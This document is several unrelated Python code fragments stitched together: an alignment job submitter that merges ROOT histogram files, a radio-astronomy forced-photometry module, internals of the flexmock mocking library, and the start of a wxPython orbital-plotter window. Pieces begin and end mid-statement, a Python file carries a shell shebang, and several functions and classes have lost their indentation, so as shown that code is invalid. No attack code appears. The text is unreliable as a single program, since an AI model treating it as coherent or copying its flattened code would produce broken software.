    if self.curIteration > 0 and not self.alignment.isDesign:  # don't have to check for isDesign here because it always ends after iteration 0...
        shutil.copyfile('{}/hists/{}/iter{}/allData_iterationApe.root'.format(base, self.name, self.curIteration-1), folderName + "/allData_iterationApe.root")

    # per-file outputs are numbered 1..nFiles by sample type
    fileNames = ['{}/hists/{}/{}{}.root'.format(base, self.name, self.dataset.sampleType, str(i)) for i in range(1, self.dataset.nFiles+1)]
    fileString = " ".join(fileNames)

    from autoSubmitterTemplates import mergeTemplate
    merge_result = subprocess.call(mergeTemplate.format(path=folderName, inputFiles=fileString), shell=True)  # returns exit code (0 if no error occured)
    # the merged file supersedes the per-file inputs, so remove them
    for name in fileNames:
        os.remove(name)

    if os.path.isfile("{}/allData.root".format(folderName)) and merge_result == 0:  # maybe check with ROOT if all neccessary contents are in?
        self.status = STATE_MERGE_DONE
    else:
        self.status = STATE_MERGE_FAILED
        self.finishTime = subprocess.check_output(["date"]).strip()
    self.print_status()
def do_summary(self):
self.status = STATE_SUMMARY_WAITING
from autoSubmitterTemplates import summaryTemplate
if self.alignment.isDesign:
#use measurement name as baseline folder name in this case
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.name)
else:
inputCommands = "iterNumber={} setBaseline={} measurementName={} baselineName={}".format(self.curIteration,self.alignment.isDesign,self.name, self.alignment.baselineDir)
summary_result = subprocess.call(summaryTemplate.format(inputCommands=inputCommands), shell=True) # returns exit code (0 if no error occured)
if summary_result == 0:
self.status = STATE_SUMMARY_DONE
else:
self.status = STATE_SUMMARY_FAILED
self.finishTime | |
import os
import logging
import datetime
import numpy as np
import pandas as pd
import dask.dataframe as dd
import dask.bag as db
from psutil import cpu_count
from glob import glob
from astropy import units as u
from astropy.coordinates import SkyCoord
from django.conf import settings
from django.db import transaction
from pyarrow.parquet import read_schema
from typing import List, Tuple, Dict
from vast_pipeline.models import Image, Measurement, Run
from vast_pipeline.pipeline.loading import make_upload_measurements
from forced_phot import ForcedPhot
from ..utils.utils import StopWatch
# Module-level logger named after this module's import path.
logger = logging.getLogger(__name__)
def remove_forced_meas(run_path: str) -> None:
    '''
    Remove forced measurements from the database if forced parquet files
    are found.

    Args:
        run_path:
            The run path of the pipeline run.

    Returns:
        None
    '''
    parquet_files = glob(
        os.path.join(run_path, 'forced_measurements_*.parquet')
    )
    if not parquet_files:
        return

    # Gather the ids of every previously recorded forced measurement, then
    # delete the matching rows (and their associations) in one transaction.
    ids = (
        dd.read_parquet(parquet_files, columns='id')
        .values
        .compute()
        .tolist()
    )
    obj_to_delete = Measurement.objects.filter(id__in=ids)
    del ids

    if obj_to_delete.exists():
        with transaction.atomic():
            n_del, detail_del = obj_to_delete.delete()
            logger.info(
                ('Deleting all previous forced measurement and association'
                 ' objects for this run. Total objects deleted: %i'),
                n_del,
            )
            logger.debug('(type, #deleted): %s', detail_del)
def get_data_from_parquet(
    file: str, p_run_path: str, add_mode: bool = False,) -> Dict:
    '''
    Get the prefix, max id and image id from the measurements parquets

    Args:
        file:
            a string with the path of the measurements parquet file
        p_run_path:
            Pipeline run path to get forced parquet in case of add mode.
        add_mode:
            Whether image add mode is being used where the forced parquet
            needs to be used instead.

    Returns:
        Dictionary with prefix string, an integer max_id and a string with
        the id of the image
    '''
    if add_mode:
        # In add-image mode prefer the forced-measurements parquet for this
        # image, when one already exists.
        image_name = file.split("/")[-2]
        forced_parquet = os.path.join(
            p_run_path,
            f"forced_measurements_{image_name}.parquet"
        )
        if os.path.isfile(forced_parquet):
            file = forced_parquet

    # get max component id from parquet file
    df = pd.read_parquet(file, columns=['island_id', 'image_id'])
    # island ids look like "<prefix>_<number>"; recover both parts
    first_island = df['island_id'].iloc[0]
    prefix = first_island.rsplit('_', maxsplit=1)[0] + '_'
    numeric_suffixes = (
        df['island_id'].str.rsplit('_', n=1)
        .str.get(-1)
        .astype(int)
        .values
    )
    max_id = numeric_suffixes.max() + 1
    return {'prefix': prefix, 'max_id': max_id, 'id': df['image_id'].iloc[0]}
def extract_from_image(
    df: pd.DataFrame, image: str, background: str, noise: str,
    edge_buffer: float, cluster_threshold: float, allow_nan: bool
) -> Dict:
    """
    Run forced photometry on one image and attach the results to *df*.

    Args:
        df:
            input dataframe with columns [source_tmp_id, wavg_ra, wavg_dec,
            image_name, flux_peak]
        image:
            path of the image FITS file
        background:
            path of the image background file
        noise:
            path of the image noise file
        edge_buffer:
            flag to pass to ForcedPhot.measure method
        cluster_threshold:
            flag to pass to ForcedPhot.measure method
        allow_nan:
            flag to pass to ForcedPhot.measure method

    Returns:
        Dictionary with the input dataframe (added columns flux_int,
        flux_int_err, chi_squared_fit) and the image name.
    """
    # Sky positions for the forced extraction; see usage at
    # https://github.com/dlakaplan/forced_phot
    positions = SkyCoord(
        df['wavg_ra'].values,
        df['wavg_dec'].values,
        unit=(u.deg, u.deg)
    )
    photometer = ForcedPhot(image, background, noise)
    flux, flux_err, chisq, dof, cluster_id = photometer.measure(
        positions,
        cluster_threshold=cluster_threshold,
        allow_nan=allow_nan,
        edge_buffer=edge_buffer
    )
    # scale fluxes by 1e3 (to mJy)
    df['flux_int'] = flux * 1.e3
    df['flux_int_err'] = flux_err * 1.e3
    df['chi_squared_fit'] = chisq
    return {'df': df, 'image': df['image_name'].iloc[0]}
def finalise_forced_dfs(
    df: pd.DataFrame, prefix: str, max_id: int, beam_bmaj: float,
    beam_bmin: float, beam_bpa: float, id: int, datetime: datetime.datetime,
    image: str
) -> pd.DataFrame:
    """
    Populate the remaining columns of a forced-photometry dataframe.

    Args:
        df:
            input dataframe with columns [source_tmp_id, wavg_ra, wavg_dec,
            image_name, flux_peak, flux_int, flux_int_err, chi_squared_fit]
        prefix:
            string used to generate the 'island_id' column
        max_id:
            first integer used to generate the 'island_id' column
        beam_bmaj:
            image beam major axis (stored in arcsec, hence * 3600)
        beam_bmin:
            image beam minor axis (stored in arcsec, hence * 3600)
        beam_bpa:
            image beam position angle
        id:
            image id in database
        datetime:
            timestamp of the image file (from header)
        image:
            string with the image name

    Returns:
        Input dataframe with added columns island_id, component_id,
        name, bmaj, bmin, pa, image_id, time.
    """
    n_rows = df.shape[0]
    # measurement names are derived from the image, island_id and component_id
    df['island_id'] = [f"{prefix}{i}" for i in range(max_id, max_id + n_rows)]
    df['component_id'] = df['island_id'].str.replace(
        'island', 'component'
    ) + 'a'
    df['name'] = image.split('.')[0] + '_' + df['component_id']

    # beam axes are stored in arcsec
    df['bmaj'] = beam_bmaj * 3600.
    df['bmin'] = beam_bmin * 3600.
    df['pa'] = beam_bpa
    # attach image id and observation time
    df['image_id'] = id
    df['time'] = datetime

    return df
def parallel_extraction(
    df: pd.DataFrame, df_images: pd.DataFrame, df_sources: pd.DataFrame,
    min_sigma: float, edge_buffer: float, cluster_threshold: float,
    allow_nan: bool, add_mode: bool, p_run_path: str
) -> pd.DataFrame:
    """
    Parallelize forced extraction with Dask.

    Args:
        df:
            dataframe with columns 'wavg_ra', 'wavg_dec', 'img_diff',
            'detection'
        df_images:
            dataframe with the images data and columns 'id',
            'measurements_path', 'path', 'noise_path', 'beam_bmaj',
            'beam_bmin', 'beam_bpa', 'background_path', 'rms_min', 'datetime',
            'skyreg__centre_ra', 'skyreg__centre_dec', 'skyreg__xtr_radius'
            and 'name' as the index.
        df_sources:
            dataframe derived from the measurement data with columns 'source',
            'image', 'flux_peak'.
        min_sigma:
            minimum sigma value to drop forced extracted measurements.
        edge_buffer:
            flag to pass to ForcedPhot.measure method.
        cluster_threshold:
            flag to pass to ForcedPhot.measure method.
        allow_nan:
            flag to pass to ForcedPhot.measure method.
        add_mode:
            True when the pipeline is running in add image mode.
        p_run_path:
            The system path of the pipeline run output.

    Returns:
        Dataframe with forced extracted measurements data, columns are
        'source_tmp_id', 'ra', 'dec', 'image', 'flux_peak', 'island_id',
        'component_id', 'name', 'flux_int', 'flux_int_err'
    """
    # explode the lists in 'img_diff' column (this will make a copy of the df)
    out = (
        df.rename(columns={'img_diff':'image', 'source':'source_tmp_id'})
        # merge the rms_min column from df_images
        .merge(
            df_images[['rms_min']],
            left_on='image',
            right_on='name',
            how='left'
        )
        .rename(columns={'rms_min': 'image_rms_min'})
        # merge the measurements columns 'source', 'image', 'flux_peak'
        .merge(
            df_sources,
            left_on=['source_tmp_id', 'detection'],
            right_on=['source', 'image'],
            how='left'
        )
        .drop(columns=['image_y', 'source'])
        .rename(columns={'image_x': 'image'})
    )

    # drop the source for which we would have no hope of detecting:
    # peak flux over the image's minimum rms must clear min_sigma
    predrop_shape = out.shape[0]
    out['max_snr'] = out['flux_peak'].values / out['image_rms_min'].values
    out = out[out['max_snr'] > min_sigma].reset_index(drop=True)
    logger.debug("Min forced sigma dropped %i sources",
        predrop_shape - out.shape[0]
    )

    # drop some columns that are no longer needed and the df should look like
    # out
    # |   |   source_tmp_id |   wavg_ra |   wavg_dec | image_name       |   flux_peak |
    # |--:|--------------:|--------:|---------:|:-----------------|----------:|
    # | 0 |            81 | 317.607 | -8.66952 | VAST_2118-06A... |    11.555 |
    # | 1 |           894 | 323.803 | -2.6899  | VAST_2118-06A... |     2.178 |
    # | 2 |          1076 | 316.147 | -3.11408 | VAST_2118-06A... |     6.815 |
    # | 3 |          1353 | 322.094 | -4.44977 | VAST_2118-06A... |     1.879 |
    # | 4 |          1387 | 321.734 | -6.82934 | VAST_2118-06A... |     1.61  |
    out = (
        out.drop(['max_snr', 'image_rms_min', 'detection'], axis=1)
        .rename(columns={'image': 'image_name'})
    )

    # get the unique images to extract from
    unique_images_to_extract = out['image_name'].unique().tolist()

    # create a list of dictionaries with image file paths and dataframes
    # with data related to each images
    image_data_func = lambda x: {
        'image': df_images.at[x, 'path'],
        'background': df_images.at[x, 'background_path'],
        'noise': df_images.at[x, 'noise_path'],
        'df': out[out['image_name'] == x]
    }
    list_to_map = list(map(image_data_func, unique_images_to_extract))
    # create a list of all the measurements parquet files to extract data from,
    # such as prefix and max_id
    list_meas_parquets = list(map(
        lambda el: df_images.at[el, 'measurements_path'],
        unique_images_to_extract
    ))
    del out, unique_images_to_extract, image_data_func

    # get a map of the columns that have a fixed value
    # (one dict per image: prefix, max_id, image id)
    mapping = (
        db.from_sequence(
            list_meas_parquets,
            npartitions=len(list_meas_parquets)
        )
        .map(get_data_from_parquet, p_run_path, add_mode)
        .compute()
    )
    mapping = pd.DataFrame(mapping)
    # remove not used columns from images_df and merge into mapping
    col_to_drop = list(filter(
        lambda x: ('path' in x) or ('skyreg' in x),
        df_images.columns.values.tolist()
    ))
    mapping = (
        mapping.merge(
            df_images.drop(col_to_drop, axis=1).reset_index(),
            on='id',
            how='left'
        )
        .drop('rms_min', axis=1)
        .set_index('name')
    )
    del col_to_drop

    # NOTE(review): n_cpu is computed but not used below — confirm whether it
    # was meant to bound npartitions.
    n_cpu = cpu_count() - 1

    # run the forced photometry of each image in parallel
    bags = db.from_sequence(list_to_map, npartitions=len(list_to_map))
    forced_dfs = (
        bags.map(lambda x: extract_from_image(
            edge_buffer=edge_buffer,
            cluster_threshold=cluster_threshold,
            allow_nan=allow_nan,
            **x
        ))
        .compute()
    )
    del bags
    # create intermediates dfs combining the mapping data and the forced
    # extracted data from the images
    intermediate_df = list(map(
        lambda x: {**(mapping.loc[x['image'], :].to_dict()), **x},
        forced_dfs
    ))

    # compute the rest of the columns
    intermediate_df = (
        db.from_sequence(intermediate_df)
        .map(lambda x: finalise_forced_dfs(**x))
        .compute()
    )
    df_out = (
        pd.concat(intermediate_df, axis=0, sort=False)
        .rename(
            columns={
                'wavg_ra':'ra', 'wavg_dec':'dec', 'image_name': 'image'
            }
        )
    )

    return df_out
def write_group_to_parquet(
df: pd.DataFrame, fname: str, add_mode: bool) -> None:
'''
Write a dataframe correpondent to a single group/image
to a parquet file.
Args:
df:
Dataframe | |
{expected.__name__}:\n"
f" Expected message:\n\t'{message}'\n"
f" Received message:\n\t'{expected_message}'"
)
)
elif expected is not raised:
raise ExceptionClassError(
f"Raised exception for call {expectation._name} "
f"did not match expectation:\n"
f" Expected:\t{repr(expected)}\n"
f" Raised:\t{raised}\n\n"
"Did you try to call and_raise with an instance?\n"
'Instead of and_raise(Exception("arg")), try and_raise(Exception, "arg")'
)
else:
raise
def match_return_values(expected: Any, received: Any) -> bool:
    """Return True if *received* matches the *expected* return specification.

    Both values are normalised to tuples so single values and multi-value
    returns compare uniformly; each element is compared with
    _arguments_match.
    """
    expected_tuple = expected if isinstance(expected, tuple) else (expected,)
    received_tuple = received if isinstance(received, tuple) else (received,)
    if len(received_tuple) != len(expected_tuple):
        return False
    return all(
        _arguments_match(got, want)
        for got, want in zip(received_tuple, expected_tuple)
    )
def pass_thru(
    expectation: Expectation, runtime_self: Any, *kargs: Any, **kwargs: Any
) -> Any:
    """Invoke the original (unmocked) implementation and verify the outcome.

    If the original raises, the exception is matched against the
    expectation; otherwise the return value is checked against any
    configured expected return values, raising MethodSignatureError on a
    mismatch.
    """
    return_values = None
    try:
        original = _getattr(expectation, "_original")
        _mock = _getattr(expectation, "_mock")
        if inspect.isclass(_mock):
            # class-level mock: special methods are stored as plain
            # functions, regular methods need the runtime instance
            if expectation._method_type in SPECIAL_METHODS:
                original = _getattr(expectation, "_original_function")
                return_values = original(*kargs, **kwargs)
            else:
                return_values = original(runtime_self, *kargs, **kwargs)
        else:
            return_values = original(*kargs, **kwargs)
    except Exception:
        # delegate to the exception-matching logic of the expectation
        return _handle_exception_matching(expectation)
    expected_values = _getattr(expectation, "_return_values")
    if expected_values and not match_return_values(expected_values[0].value, return_values):
        expected_value = expected_values[0].value
        # Display strings with quotes in the error message
        if isinstance(return_values, str):
            return_values = repr(return_values)
        if isinstance(expected_value, str):
            expected_value = repr(expected_value)
        raise (
            MethodSignatureError(
                f"Returned values for call {expectation._name} did not match expectation:\n"
                f"  Expected:\t{expected_value}\n"
                f"  Returned:\t{return_values}"
            )
        )
    return return_values
def _handle_matched_expectation(
    expectation: Expectation, runtime_self: Any, *kargs: Any, **kwargs: Any
) -> Any:
    """Execute the behaviour configured on a matched expectation.

    Checks the when-condition, bumps the call counter, then either passes
    through to the original, calls the replacement, or produces the next
    configured return value / raise.
    """
    if not expectation._runnable():
        # NOTE: `name` comes from the enclosing scope
        raise StateError(
            f"{name} expected to be called when {expectation._get_runnable()} is True"
        )
    expectation._times_called += 1
    expectation._verify(final=False)
    _pass_thru = _getattr(expectation, "_pass_thru")
    _replace_with = _getattr(expectation, "_replace_with")
    if _pass_thru:
        return pass_thru(expectation, runtime_self, *kargs, **kwargs)
    if _replace_with:
        return _replace_with(*kargs, **kwargs)
    return_values = _getattr(expectation, "_return_values")
    if return_values:
        # rotate the list so consecutive calls cycle through the
        # configured return values round-robin
        return_value = return_values[0]
        del return_values[0]
        return_values.append(return_value)
    else:
        return_value = ReturnValue()
    if return_value.raises:
        if inspect.isclass(return_value.raises):
            # raise-spec given as class + args: instantiate it now
            raise return_value.raises(
                *return_value.value["kargs"], **return_value.value["kwargs"]
            )
        raise return_value.raises  # pylint: disable=raising-bad-type
    return return_value.value
def mock_method(runtime_self: Any, *kargs: Any, **kwargs: Any) -> Any:
arguments = {"kargs": kargs, "kwargs": kwargs}
expectation = FlexmockContainer.get_flexmock_expectation(self, name, arguments)
if expectation:
return _handle_matched_expectation(expectation, runtime_self, *kargs, **kwargs)
# inform the user which expectation(s) for the method were _not_ matched
saved_expectations = reversed(FlexmockContainer.get_expectations_with_name(self, name))
error_msg = (
f"Arguments for call {name} did not match expectations:\n"
f" Received call:\t{_format_args(name, arguments)}\n"
)
if saved_expectations:
error_msg += "\n".join(
f" Expected call[{index}]:\t{_format_args(name, expectation._args)}"
for index, expectation in enumerate(saved_expectations, 1)
)
raise MethodSignatureError(error_msg)
return mock_method
def flexmock_teardown() -> None:
    """Performs flexmock-specific teardown tasks.

    Order is deliberate: reset every expectation, strip per-method
    bookkeeping attributes, restore any attributes Mock replaced on real
    classes/instances, clear container state, and only then verify the
    saved expectations -- so a verification failure cannot leave a
    patched object un-restored.
    """
    saved = {}
    instances = []
    classes = []
    # Reset everything first, keeping copies so expectations can still be
    # verified at the very end.
    for mock_object, expectations in FlexmockContainer.flexmock_objects.items():
        saved[mock_object] = expectations[:]
        for expectation in expectations:
            _getattr(expectation, "_reset")()
        for expectation in expectations:
            # Remove method type attributes set by flexmock. This needs to be done after
            # resetting all the expectations because method type is needed in expectation teardown.
            if inspect.isclass(mock_object) or hasattr(mock_object, "__class__"):
                try:
                    delattr(mock_object._object, f"{expectation._name}__flexmock__method_type")
                except (AttributeError, TypeError):
                    pass
    # Partition the mocked-over targets into real instances and classes.
    for mock in saved:
        obj = mock._object
        if not isinstance(obj, Mock) and not inspect.isclass(obj):
            instances.append(obj)
        if inspect.isclass(obj):
            classes.append(obj)
    # Remove Mock-injected attributes, identified by code-object identity
    # with the corresponding Mock method.
    for obj in instances + classes:
        for attr in UPDATED_ATTRS:
            try:
                obj_dict = obj.__dict__
                if obj_dict[attr].__code__ is Mock.__dict__[attr].__code__:
                    del obj_dict[attr]
            except Exception:
                # __dict__ may be unwritable (e.g. a mappingproxy) or the
                # entry missing; fall back to attribute-level access.
                try:
                    if getattr(obj, attr).__code__ is Mock.__dict__[attr].__code__:
                        delattr(obj, attr)
                except AttributeError:
                    pass
    FlexmockContainer.teardown_properties()
    FlexmockContainer.reset()
    # make sure this is done last to keep exceptions here from breaking
    # any of the previous steps that cleanup all the changes
    for mock_object, expectations in saved.items():
        for expectation in expectations:
            _getattr(expectation, "_verify")()
class Expectation:
"""Holds expectations about methods.
The information contained in the Expectation object includes method name,
its argument list, return values, and any exceptions that the method might
raise.
"""
def __init__(
self,
mock: Mock,
name: Optional[str] = None,
return_value: Optional[Any] = None,
original: Optional[Any] = None,
method_type: Optional[Any] = None,
) -> None:
if original is not None:
self._original = original
self._name = name
self._times_called: int = 0
self._modifier: str = EXACTLY
self._args: Optional[Dict[str, Any]] = None
self._method_type = method_type
self._argspec: Optional[inspect.FullArgSpec] = None
self._return_values = [ReturnValue(return_value)] if return_value is not None else []
self._replace_with: Optional[Callable[..., Any]] = None
self._original_function: Optional[Callable[..., Any]] = None
self._expected_calls = {EXACTLY: None, AT_LEAST: None, AT_MOST: None}
self._runnable: Callable[..., bool] = lambda: True
self._mock = mock
self._pass_thru = False
self._ordered = False
self._one_by_one = False
self._verified = False
self._callable = True
self._local_override = False
def __str__(self) -> str:
args = _format_args(str(self._name), self._args)
return_values = ", ".join(str(x) for x in self._return_values)
return f"{args} -> ({return_values})"
    def __call__(self) -> "Expectation":
        """Calling an expectation is a no-op that returns the expectation itself."""
        return self
def __getattribute__(self, name: str) -> Any:
if name == "once":
return _getattr(self, "times")(1)
if name == "twice":
return _getattr(self, "times")(2)
if name == "never":
return _getattr(self, "times")(0)
if name in ("at_least", "at_most", "ordered", "one_by_one"):
return _getattr(self, name)()
if name == "mock":
return _getattr(self, "mock")()
return _getattr(self, name)
def __getattr__(self, name: str) -> NoReturn:
self.__raise(
AttributeError, f"'{self.__class__.__name__}' object has not attribute '{name}'"
)
def _get_runnable(self) -> str:
"""Ugly hack to get the name of when() condition from the source code."""
name = "condition"
try:
source = inspect.getsource(self._runnable)
if "when(" in source:
name = source.split("when(")[1].split(")")[0]
elif "def " in source:
name = source.split("def ")[1].split("(")[0]
except Exception:
# couldn't get the source, oh well
pass
return name
    def _verify_signature_match(self, *kargs: Any, **kwargs: Any) -> None:
        """Validate that the expected *kargs/**kwargs fit the original signature.

        Raises MethodSignatureError describing the first violation found:
        too few or too many positional arguments, an argument given both
        positionally and by keyword, an unknown keyword argument, or a
        missing required keyword-only argument. No-op for fake objects.
        """
        if isinstance(self._mock, Mock):
            return  # no sense in enforcing this for fake objects
        allowed = self._argspec
        args_len = len(allowed.args)
        # self is the first expected argument
        has_self = allowed.args and allowed.args[0] == "self"
        # Builtin methods take `self` as the first argument but `inspect.ismethod` returns False
        # so we need to check for them explicitly
        is_builtin_method = isinstance(self._original, BuiltinMethodType) and has_self
        # Methods take `self` if not a staticmethod
        is_method = inspect.ismethod(self._original) and self._method_type is not staticmethod
        # Class init takes `self`
        is_class = inspect.isclass(self._original)
        # When calling class methods or instance methods on a class method takes `cls`
        is_class_method = (
            inspect.isfunction(self._original)
            and inspect.isclass(self._mock)
            and self._method_type is not staticmethod
        )
        if is_builtin_method or is_method or is_class or is_class_method:
            # Do not count `self` or `cls`.
            args_len -= 1
        # Fewest positional args the callable accepts (defaults are optional).
        minimum = args_len - (allowed.defaults and len(allowed.defaults) or 0)
        maximum = None
        if allowed.varargs is None and allowed.varkw is None:
            maximum = args_len
        # Keyword args that name positional parameters count toward the total.
        total_positional = len(kargs + tuple(a for a in kwargs if a in allowed.args))
        named_optionals = [
            a
            for a in kwargs
            if allowed.defaults
            if a in allowed.args[len(allowed.args) - len(allowed.defaults) :]
        ]
        if allowed.defaults and total_positional == minimum and named_optionals:
            minimum += len(named_optionals)
        if total_positional < minimum:
            arguments = "argument" if minimum == 1 else "arguments"
            raise MethodSignatureError(
                f"{self._name} requires at least {minimum} {arguments}, "
                f"expectation provided {total_positional}"
            )
        if maximum is not None and total_positional > maximum:
            arguments = "argument" if maximum == 1 else "arguments"
            raise MethodSignatureError(
                f"{self._name} requires at most {maximum} {arguments}, "
                f"expectation provided {total_positional}"
            )
        # Same parameter supplied both positionally and as a keyword.
        if args_len == len(kargs) and any(a for a in kwargs if a in allowed.args):
            given_args = [a for a in kwargs if a in allowed.args]
            arguments = "argument" if len(given_args) == 1 else "arguments"
            raise MethodSignatureError(
                f"{given_args} already given as positional {arguments} to {self._name}"
            )
        # Unknown keyword argument (only enforceable without **kwargs).
        if not allowed.varkw and any(
            a for a in kwargs if a not in allowed.args + allowed.kwonlyargs
        ):
            invalid_arg = [a for a in kwargs if a not in allowed.args + allowed.kwonlyargs][0]
            raise MethodSignatureError(
                f"{invalid_arg} is not a valid keyword argument to {self._name}"
            )
        # check that kwonlyargs that don't have default value specified are provided
        required_kwonlyargs = [
            a for a in allowed.kwonlyargs if a not in (allowed.kwonlydefaults or {})
        ]
        missing_kwonlyargs = [a for a in required_kwonlyargs if a not in kwargs]
        if missing_kwonlyargs:
            arguments = "argument" if len(missing_kwonlyargs) == 1 else "arguments"
            missing_args = '", "'.join(missing_kwonlyargs)
            raise MethodSignatureError(
                f'{self._name} requires keyword-only {arguments} "{missing_args}"'
            )
def _update_original(self, name: str, obj: Any) -> None:
if hasattr(obj, "__dict__") and name in obj.__dict__:
self._original = obj.__dict__[name]
else:
self._original = getattr(obj, name)
self._update_argspec()
def _update_argspec(self) -> None:
original = self.__dict__.get("_original")
if original:
try:
self._argspec = inspect.getfullargspec(original)
except TypeError:
# built-in function: fall back to stupid processing and hope the
# builtins don't change signature
pass
def _normalize_named_args(self, *kargs: Any, **kwargs: Any) -> Dict[str, Any]:
argspec = self._argspec
default = | |
#!/bin/sh
# -*- coding:utf-8
import os
#import psutil # downloaded from http://code.google.com/p/psutil/downloads/detail?name=psutil-1.0.1.win32-py2.7.exe&can=2&q=
import wxversion
wxversion.select("2.8")
import wx
# import FU modules
import fumodel
import view
import const
import lib
import molec
import graph
from numpy import *
try: import fucubelib
except: pass
class DrawOrbital():
    """Controller that owns the orbital-plot window (DrawOrbital_Frm).

    Keeps references to the parent window, model and viewer, plus the
    per-panel orbital-energy data list, and opens the plot frame on request.
    """
    def __init__(self,parent,model,viewer):
        self.parent=parent
        self.model=model
        self.viewer=viewer
        self.orbitallst=[]  # one entry per orbital panel in the plot window
    def OpenDrawWin(self,orbitallst):
        # NOTE(review): self.parent is passed where DrawOrbital_Frm expects
        # the `model` argument -- looks like it should be self.model; confirm.
        self.draworb=DrawOrbital_Frm(self.parent,-1,self.parent,self.viewer,orbitallst=orbitallst)
    def SetOrbitalList(self,orbitallst):
        self.orbitallst=orbitallst
    def SetMode(self,mode):
        # NOTE(review): self.mode is created here only, never in __init__.
        self.mode=mode
    def SetViewer(self,viewer):
        self.viewer=viewer
class DrawOrbital_Frm(wx.MiniFrame):
def __init__(self,parent,id,model,viewer,mode=0,winpos=[-1,-1],
orbitallst=[]): #,model,ctrlflag,molnam,winpos):
"""
:param obj parent: parent object
:param int id: object id
:param obj model: an instance of "Model" (model.py)
:param obj viewer: viewer instance
:param int mode: 0 for stand alone, 1 for child (no menu)
"""
self.title='Orbital plotter'
self.orbitallst=orbitallst
self.magnify=False
###self.orbitallst=[[[-20,-15,-10,5,10,15]],[[-50,-20,-15,-10,5,10,15],[-15,-10,-5,8,10,12]]]
#self.orbitallst=[[[-20,-15,-10,5,10,15]]]
norbpanel=len(self.orbitallst)
#if norbpanel <= 0: norbpanel=1
self.orbitalpanwidth=115
winwidth=100+8+norbpanel*self.orbitalpanwidth
if norbpanel <= 0: winwidth=110
winsize=lib.MiniWinSize([winwidth,340]) #([100,355])
self.norbpanel=norbpanel
wx.MiniFrame.__init__(self,parent,id,self.title,pos=winpos,size=winsize,
style=wx.SYSTEM_MENU|wx.CAPTION|wx.CLOSE_BOX|wx.FRAME_FLOAT_ON_PARENT)
self.parent=parent
self.mode=mode
if mode == 1:
self.viewer=viewer
#self.SetTransparent(100)
self.model=model # model #parent.model
#self.mdlwin=model.mdlwin
#self.draw=self.mdlwin.draw
#self.ctrlflag=model.ctrlflag
self.ctrlflag={}
""" need codes """
self.homoorbnmblst=self.norbpanel*[3]
self.maxorbnmblst=self.norbpanel*[20]
self.plotterpanwidth=100
self.orbitalpanwidth=115
self.orbpanel=self.norbpanel*[None]
self.orbtitle=self.norbpanel*['orbiatl']
self.orbgraph=self.norbpanel*[None]
self.orbcheck=self.norbpanel*[None]
self.lumoplus=self.norbpanel*[0]
self.minlumo=self.norbpanel*[0]
self.maxlumo=self.norbpanel*[50]
self.homominus=self.norbpanel*[0]
self.minhomo=self.norbpanel*[0]
self.maxhomo=self.norbpanel*[50]
self.spin=self.norbpanel*['']
self.widgetiddic={}
self.curdata=0
self.erangemin=-15.0
self.erangemax=5.0
# menu
if self.mode == 0:
menud=self.MenuItems() # method of MyModel class
# Create menu using model.fuMenu class
self.menubar=self.MenuItems() # create instance of fuMenu class
self.SetMenuBar(self.menubar) # method of wxFrame class
self.Bind(wx.EVT_MENU,self.OnMenu)
#
self.bgcolor='light gray'
#self.cubedataname=[]
nulobj=CubeObj()
self.denobjdic={}; self.denobjdic[' ']=nulobj
self.denobjlst=[] #[' ','den-cube-1','den-cube-2','den-cube-3']
self.mepobjdic={}; self.mepobjdic[' ']=nulobj
self.mepobjlst=[] #[' ','mep-cube-1','mep-cube-2','mep-cube-3']
self.cubeobjdic={}; self.cubeobjdic[' ']=nulobj
self.cubeobjlst=[]
self.curden=' '
self.curmep=' '
self.curcube=' '
#self.cubefile=''
self.prptxt=['DENSITY','MEP','CUBE']
self.property=0
self.style=0 # 0:solid, 1:mesh
self.ondraw=False
self.superimpose=False
self.xcubemin=0.0; self.xcubemax=0.0
self.ycubemin=0.0; self.ycubemax=0.0
self.zcubemin=0.0; self.zcubemax=0.0
self.xcubecnt=0.0; self.ycubecnt=0.0; self.zcubecnt=0.0
self.valuemin=0.0; self.valuemax=0.0
self.nx=0; self.ny=0; self.nz=0
# params for draw
self.xmin=-1; self.xmax=-1
self.ymin=-1; self.ymax=-1
self.zmin=-1; self.zmax=-1
self.value=0.05
self.interpol=1
self.minipo=1
self.maxipo=4 # maximum degree of intepolation for cube data
self.opacity=0.5 # 0-1
self.colortxt=['red','magenta','yellow','orange','brown','blue','cyan','green','purple',
'white','gray','black','---','palette']
self.colorpos=self.colortxt[0]; self.rgbpos=const.RGBColor[self.colorpos]
self.colorneg=self.colortxt[6]; self.rgbneg=const.RGBColor[self.colorneg]
# polygons
self.polyg=[]
# create panel
self.CreatePlotterPanel()
for i in range(self.norbpanel): self.CreateOrbitalPanel(i)
self.SetParamsToWidgets()
#
if self.mode == 1: self.GetCubeFileAndMakeCubeObjDic()
#
self.Show()
# initialize view
self.InitDrawOrbitalWin()
#orbnmb=self.GetOrbitalNumberInTC()
#self.SetOrbValueToOrbTC(self.curdata,orbnmb)
# activate event handlers
self.Bind(wx.EVT_CLOSE,self.OnClose)
    def InitDrawOrbitalWin(self):
        """Initial view setup: draw the orbital-energy graphs once."""
        self.PlotEnergy()
        """ need codes for spin and orbital selection in graph """ #
        #spinobj=self.GetSpinObject(self.cutdata)
    def OpenInfoPanel(self):
        """Open a small text control and fill it with cube-data information.

        NOTE(review): the TextCtrl is created with parent None -- wx
        normally requires a window parent for wx.TextCtrl; confirm this
        actually displays as intended.
        """
        pos=self.GetPosition()
        winpos=pos; winsize=[80,40]
        self.tcinfo=wx.TextCtrl(None,-1,'',pos=winpos,size=winsize,style=wx.TE_MULTILINE)
        self.tcinfo.SetBackgroundColour('light gray')
        self.DispCubeDataInfo()
def CreatePlotterPanel(self):
size=self.GetClientSize()
w=size[0]; h=size[1]
w=self.plotterpanwidth
hcb=const.HCBOX # height of combobox
ff='%5.0f'
# upper panel
self.panel=wx.Panel(self,-1,pos=(-1,-1),size=(w,h)) #ysize))
self.panel.SetBackgroundColour(self.bgcolor)
# cubedata
yloc=5; xloc=10
#btninfo=wx.Button(self.panel,wx.ID_ANY,"Data info",pos=(xloc,yloc-2),size=(70,20))
#btninfo.Bind(wx.EVT_BUTTON,self.OnInfo)
#btninfo.SetToolTipString('Display plot data information')
# style
#yloc += 25
ststyle=wx.StaticText(self.panel,-1,label='Style:',pos=(xloc,yloc),size=(35,18))
ststyle.SetToolTipString('Choose drawing style')
#yloc += 18
#self.rbtsold=wx.RadioButton(self.panel,-1,"solid",pos=(xloc+10,yloc),size=(45,18),
self.rbtsold=wx.RadioButton(self.panel,-1,"solid",pos=(xloc+40,yloc),size=(40,18),
